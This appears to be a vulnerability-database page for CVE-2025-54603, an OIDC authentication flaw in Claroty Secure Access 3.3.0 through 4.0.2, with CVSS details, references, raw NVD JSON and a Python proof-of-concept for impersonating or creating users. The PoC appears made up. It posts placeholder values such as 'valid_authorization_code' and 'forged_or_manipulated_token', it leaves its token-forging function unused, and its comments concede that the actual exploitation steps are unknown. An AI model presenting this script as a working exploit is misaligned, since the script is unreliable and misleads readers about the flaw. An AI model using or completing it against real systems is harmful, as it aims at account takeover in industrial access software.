CVE-2025-54603

Description

An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Claroty Secure Access >= 3.3.0

Claroty Secure Access <= 4.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54603 PoC - Claroty Secure Access OIDC Authentication Bypass # This PoC demonstrates the OIDC authentication flow exploitation import requests import json import jwt # PyJWT library from urllib.parse import urlencode TARGET_URL = "https://target-claroty-instance.com" OIDC_CALLBACK_ENDPOINT = "/auth/oidc/callback" def generate_forged_oidc_token(target_user_email, target_user_sub): """ Generate a forged OIDC ID token mimicking legitimate user attributes. In vulnerable versions, the server fails to properly validate token claims, allowing impersonation. """ # In a real exploit, the attacker would need to obtain or forge # a valid signed token. The vulnerability lies in the server-side # validation logic being insufficient. forged_claims = { "iss": "https://attacker-controlled-idp.com", "sub": target_user_sub, "email": target_user_email, "name": "Impersonated User", "aud": "claroty-secure-access-client", "iat": 1697280000, "exp": 2697280000, } # Note: Actual exploitation requires either: # 1. A misconfigured OIDC setup where the IdP is attacker-controlled # 2. Ability to manipulate the OIDC callback parameters # 3. Exploiting the incorrect user provisioning logic return forged_claims def exploit_oidc_user_creation(target_url, attacker_email): """ Exploit the incorrect OIDC authentication flow to create an unauthorized user account in Claroty Secure Access. """ session = requests.Session() # Step 1: Initiate OIDC authentication flow auth_params = { "response_type": "code", "client_id": "claroty-secure-access", "redirect_uri": f"{target_url}{OIDC_CALLBACK_ENDPOINT}", "scope": "openid email profile", "state": "attacker_state_token", } # Step 2: The vulnerability allows sending manipulated callback # with crafted parameters that bypass proper user validation callback_params = { "code": "valid_authorization_code", "state": "attacker_state_token", "id_token_hint": "forged_or_manipulated_token", } # Step 3: Send the crafted callback to create unauthorized user callback_url = f"{target_url}{OIDC_CALLBACK_ENDPOINT}" response = session.post( callback_url, data=callback_params, allow_redirects=False ) if response.status_code in [200, 302]: print(f"[+] Exploit successful - User may have been created/impersonated") print(f"[+] Response: {response.headers.get('Location', 'N/A')}") return True else: print(f"[-] Exploit failed - Status: {response.status_code}") return False def exploit_oidc_user_impersonation(target_url, victim_email): """ Exploit the OIDC vulnerability to impersonate an existing user. """ session = requests.Session() # Craft OIDC callback with victim's identity information # The server's flawed validation logic accepts this as legitimate impersonation_params = { "code": "stolen_or_manipulated_code", "state": "valid_state", "email": victim_email, } callback_url = f"{target_url}{OIDC_CALLBACK_ENDPOINT}" response = session.post( callback_url, data=impersonation_params, allow_redirects=False ) if response.status_code in [200, 302]: print(f"[+] Impersonation of {victim_email} may be successful") return session return None if __name__ == "__main__": # Example usage - for authorized testing only # exploit_oidc_user_creation(TARGET_URL, "[email protected]") # exploit_oidc_user_impersonation(TARGET_URL, "[email protected]") print("CVE-2025-54603 PoC - For authorized security testing only")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54603
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54603
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54603/
[4] VulDB https://vuldb.com/cve/CVE-2025-54603
[5] https://claroty.com
[6] https://claroty.com/product-security/oidc-configurations-in-claroty-secure-access

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54603", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:44.307", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://claroty.com", "source": "[email protected]"}, {"url": "https://claroty.com/product-security/oidc-configurations-in-claroty-secure-access", "source": "[email protected]"}]}}